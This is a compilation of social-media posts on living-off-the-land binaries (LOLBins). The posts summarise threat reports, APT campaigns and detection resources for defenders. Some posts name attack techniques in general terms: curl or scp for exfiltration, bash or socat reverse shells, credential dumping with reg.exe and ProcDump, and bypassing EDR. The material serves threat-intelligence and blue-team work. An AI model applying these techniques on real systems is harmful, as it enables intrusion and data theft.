No PE header? No problem.

@FortiGuardLabs dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.

You ever load a binary in IDA and think, “Am I being punk’d?”
Yeah, it’s one of those samples.

This sample:

• Reconstructs its own PE structure at runtime

• Hides config data in obfuscated blobs

• Uses anti-sandbox tricks to avoid analysis

• Drops yet another info-stealer, because originality is dead

It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.

🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header

TL;DR for blue teamers:

• Static AV signatures won’t help here

• Watch for suspicious memory allocations + hollowing patterns

• Endpoint heuristics > file-based detection

• Log your PowerShell and LOLBins — this thing probably brings friends

• If your EDR cries when it sees raw shellcode, maybe give it a hug

#ThreatIntel #MalwareAnalysis #ReverseEngineering #Infosec #PEFilesAreSo2020 #EDREvasion #LOLbins #CyberSecurity #BlueTeam

On Linux systems, some of the most dangerous hacking tools are already preinstalled. Bash, curl, netcat, awk, even less — these common binaries can be chained together for stealthy attacks. They are called Linux LOLBins, short for Living Off the Land Binaries. Rather than dropping new malware, an attacker can leverage what is already there to stay undetected. Need to exfiltrate data? Use curl or scp. Want a reverse shell? Try bash or socat. Fileless persistence, privilege escalation, lateral movement — it can all happen through trusted tools.

Security is not just about locking the doors. It is about knowing which ones are left wide open by default.

#LinuxSecurity #LOLBins #LivingOffTheLand #RedTeamTips #CommandLineWarfare

They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitch

http://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/

https://blog.talosintelligence.com/salt-typhoon-analysis/
#SaltTyphoon #lolbins #livingofftheland

Was looking for a good Awesome list on Living Off the Land ( #LOL #LOtL ) tools/techniques. Found some helpful sites / repos but either nothing I could contribute to or it was limited.

So... I made one: https://github.com/danzek/awesome-lol-commonly-abused

Contributions welcome, whether by replying to this post or sending a PR on GitHub.

#lolbins #lolbas

#Hackers are abusing #Microsoft tools more than ever before

Abuse of #LOLbins in #cyberattacks is skyrocketing, Sophos says

https://www.techradar.com/pro/security/hackers-are-abusing-microsoft-tools-more-than-ever-before

an awesome overview of all the LOL and GTFO stuff. Even some are well known it's a good overview.

https://github.com/sheimo/awesome-lolbins-and-beyond

#redteam #lolbin #gtfo #securityressource #lolbins #blueteam #detectionengineering

Detecting Malicious Use of LOLBins: https://www.huntress.com/blog/detecting-malicious-use-of-lolbins

#lolbins #threathunting #threatdetection

Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found

https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger

#DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
@keydet89

"🍎 macOS Malware 2023: Navigating the New Threat Landscape 🌐"

Apple's XProtect recently updated to version 2173, introducing rules for Atomic Stealer and Adload. However, 2023 has unveiled novel methods to compromise Macs, leaving users vulnerable unless additional protective measures are taken. Key insights:

1. Shift in Malware Behavior: Many macOS malware families in 2023 have ditched persistence. Infostealers, for instance, achieve their goals in a single execution, stealing user data and then transmitting it to a remote server. 📥🔓

2. Sophisticated Social Engineering: Threat actors are employing advanced social engineering tactics. RustBucket malware, for example, lured victims with a business deal, urging them to download a 'proprietary' PDF viewer, which in reality was malware. 🎣📄

3. Public Offensive Security Tools: Tools like Geacon, which wraps Cobalt Strike capabilities, are now being seen in macOS malware. Open-source red teaming tools like Mythic and Poseidon have also been spotted in recent campaigns. 🛠️🔥

4. LOLBins Techniques: "Living off the orchard" techniques are on the rise in macOS. Built-in tools like system_profiler, sw_vers, and curl are being exploited for malicious purposes. 🌳🔧

5. Abusing Open Source Software: JokerSpy malware, discovered in July 2023, began its infection through a trojanized QR code generator, QRLog. This malware was found in enterprise breaches, including a major cryptocurrency exchange. 🔄💼

6. Complex Multi-Stage Malware: The Smooth Operator campaign, a sophisticated supply chain attack, compromised businesses via 3CX's call routing software client. The malware was designed for stealth, gathering limited data and then self-deleting. 📞🕵️

While Apple is enhancing its malware detection capabilities, third-party solutions are still crucial for comprehensive protection against both common and advanced threats. SentinelOne offers a robust platform for macOS threat detection and remediation. 🛡️💻

Source: SentinelOne

Tags: #macOS #Malware #CyberSecurity #XProtect #Infostealers #SocialEngineering #OffensiveSecurity #LOLBins #OpenSource #SentinelOne 🌍🔒🖥️

The Symantec research team uncovered an espionage campaign from the #APT group they track as #Redfly. The group used multiple tools during the campaign which included the #ShadowPad trojan, #Packerloader, and a key logger. They also abused some #LOLBINs to achieve their goals.

Redfly masqueraded ShadowPad in a "VMware" directory and gained persistence by creating a service that ran the malware once the computer started and the keylogger stored its captured keystrokes in a directory that included "Intel" in the path. The APT group used the reg.exe to dump credentials from he SYSTEM, SAM, and SECURITY hive. They also used a renamed version of ProcDump to dump credentials from LSASS. Powershell was also used to gather information on the storage devices attached to the system and finally a scheduled task was created to preform side-loading and lateral movement. #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

#APT28 resurfaces to set eyes on the Ukrainian power industry sector. #CERTUA warns defenders of a new #phishing attack abusing Microsoft Edge downloader, #TOR, #Mockbin, and #LOLBins. Detect adversary activity with #Sigma rules from SOC Prime Platform.

https://socprime.com/blog/apt28-phishing-attack-detection-hackers-target-ukrainian-energy-sector-using-microsoft-edge-downloader-tor-software-and-the-mockbin-service-for-remote-management/

While most of us celebrate Labor Day let's all try to take a moment to remember those who don't get to spend time with their loved ones today, wherever they may be and whatever they may be doing!

I don't know how this report slid under my radar but the ESET researched team unveil a "Marioesque" themed adversary, #MoustachedBouncer! They are a cyberespionage group that targets foreign embassies in Belarus with the use of their ISP level access and their tools #NightClub and #Disco. Using their (assumed) unique level of access, they compromise their targets by redirecting them to a fake #Microsoft update site which loads JavaScript code then leads to a zip file being downloaded. The team wasn't able to get the zip file, but they were still able to identify some TTPs and #LOLBINS abuse, such as creating a malicious scheduled task. I hope you enjoy and Happy Hunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #LaborDay

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

If you are familiar with #lolbins then this definitely will be interesting for you
#LOLDrivers is the list of Windows drivers used by adversaries to bypass security mechanisms. Great resource to develop new detections in your environment
https://www.loldrivers.io/
#infosec #dfir #threathunting #blueteam

#HappyMonday everyone! This #readoftheday is a BEAST and a good way to start the week! The researchers ThreatMon conducted a deep dive into #APT41 activity and provide technical details of a custom-built backdoor that leverages #PowerShell. Enjoy and Happy Hunting!

APT41's Attack Chain: Exe-LolBins Leads to Powershell Backdoor with Telegram C2
https://cybersecuritynews.com/wp-content/uploads/2023/05/Threatmon-cyber-security-news.pdf

Notable MITRE ATT&CK TTPs:
TA0005 - Defense Evasion
T1202 - Indirect Command Execution
T1112 - Modify Registry

TA0003 - Persistence
T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)

TA0002 - Execution
T1059.001 - Command And Scripting Interpreter: Powershell
T1047 - Windows Management Instrumentation

TA0011 - Command And Control
T1071 - Application Layer Protocol

TA0007 - Discovery
T1016 - System Network Configuration Discovery

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #LOLBINS

Shout out to Malwarebytes Labs team for this #readoftheday! I am a huge fan of anything Living-off-the-land binaries (#LOLBINS) and I this article provides a great description of what they are and how #filelessattacks compare and contrast. Enjoy and Happy Hunting!

Fileless attacks: How attackers evade traditional AV and how to stop them
https://www.malwarebytes.com/blog/business/2023/04/fileless-attacks-how-attackers-evade-traditional-av-and-how-to-stop-them

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

On Episode 2 of our technical #livestream series #WhatTheVuln, Lindsay Von Tish discussed a technique for bypassing #EDR via #LoLBins. In this blog post, she goes into detail about the technique including how she initially discovered it.

Give it a read today!
https://bfx.social/3Gn3Fmw #infosec

Happy Monday everyone! Today's #readoftheday focuses on a recently discovered ransomware strain that exhibits some behaviors that have allowed it to fly under the radar of researchers. The #BabLock, or also known as #Rorschach by Check Point Software Technologies Ltd, exploits CVEs and some living-off-the-land (#LOLBINs) to accomplish their goals. Check out the article by Group-IB for the rest of the details! Happy Hunting!

The old way: BabLock, new ransomware quietly cruising around Europe, Middle East, and Asia
https://www.group-ib.com/blog/bablock-ransomware/

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.

And don’t fret if you missed the initial livestream – you can watch the recording on demand! https://bfx.social/3K4T1mS

P.S. Episode 3 is on the way!